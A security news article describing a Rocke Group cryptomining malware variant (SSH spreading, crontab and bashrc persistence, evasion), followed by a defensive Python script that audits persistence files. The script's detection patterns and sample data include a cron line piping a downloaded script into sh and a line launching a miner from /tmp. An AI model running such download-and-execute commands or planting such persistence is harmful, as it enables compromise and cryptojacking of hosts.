Morphisec cybersecurity experts: The malware, written in .NET, is delivered through an MSI installer and thwarts online AV scanners.
Intezer: Rocke Group is using a new malware variant to infect network machines using saved SSH keys and weak passwords. Once the victim is infected, a Monero cryptominer is executed
Rocke Group is using a new malware variant to infect network machines using saved SSH keys and weak passwords. It has been discovered by Intezer cybersecurity experts. It also exploits vulnerabilities in platforms and services such as Jenkins, Redis and ActiveMQ. Once the victim is infected, a Monero cryptominer is executed. The China-linked APT initially delivers the malicious code to the victim’s server packed with a modified UPX, which can make it harder for some EDR products to detect the malware. The threat contains a number of modules stored in compressed form inside the code; during execution the payloads are extracted and executed. Furthermore, Rocke Group uses a new script that downloads malware from a hosting server and executes it. This script then uses the public SSH keys saved in the “known_hosts” file on the victim’s Linux machine to infect other machines on the network.
The behaviour of the malicious code
According to the cybersecurity experts, the cybercrime actor’s malware achieves persistence using a scheduled task in crontab and in bashrc files. Next, the malicious code attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak passwords. Then, it exploits vulnerabilities. To hide the activity of the malware, it implements an evasion technique that uses library hijacking. Moreover, before the miner is executed, the dropper kills any other process that uses more than 30% of the cloud server’s CPU. In this way the Rocke Group malicious code will have all of the CPU for itself.
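As an added illustration (not Intezer's analysis code nor anything from the malware), the following audit checks the two persistence locations the article names, crontab and bashrc, for download-and-execute entries of the kind a dropper leaves behind. The regex patterns and the sample lines are constructed for this example and are not indicators from the report.

```python
"""Audit crontab and bashrc content for download-and-execute persistence entries.
Constructed example for illustration; patterns are assumptions, not published IoCs."""
import re
from typing import Iterable

# Patterns a defender would treat as suspicious in a persistence location.
DOWNLOAD_TOOLS = r"\b(curl|wget)\b"
PIPE_TO_SHELL = re.compile(DOWNLOAD_TOOLS + r".*\|\s*(ba)?sh\b")
EXEC_FROM_TMP = re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/\S+")
BASE64_DECODE = re.compile(r"base64\s+(-d|--decode)")


def suspicious_reasons(line: str) -> list[str]:
    """Return the reasons a single crontab/bashrc line looks like malicious persistence."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    reasons = []
    if PIPE_TO_SHELL.search(line):
        reasons.append("downloads a script and pipes it into a shell")
    if EXEC_FROM_TMP.search(line):
        reasons.append("runs a binary from a world-writable temp directory")
    if BASE64_DECODE.search(line):
        reasons.append("decodes an embedded base64 payload")
    return reasons


def audit(source: str, lines: Iterable[str]) -> list[tuple[str, str, list[str]]]:
    """Audit one persistence location; returns (source, line, reasons) for each hit."""
    return [(source, l.strip(), r) for l in lines if (r := suspicious_reasons(l))]


# Constructed sample content standing in for a root crontab and a user's ~/.bashrc.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/10 * * * * curl -fsSL http://example.invalid/x.sh | sh",
]
SAMPLE_BASHRC = [
    "export PATH=$HOME/bin:$PATH",
    "nohup /tmp/.cache/miner >/dev/null 2>&1 &",
]

if __name__ == "__main__":
    for src, line, reasons in audit("crontab", SAMPLE_CRONTAB) + audit("bashrc", SAMPLE_BASHRC):
        print(f"[{src}] {line}\n    -> {'; '.join(reasons)}")
```

On a live host the same functions can be fed the output of `crontab -l` and the contents of each user's `.bashrc`; a hit is a starting point for triage, not proof of compromise.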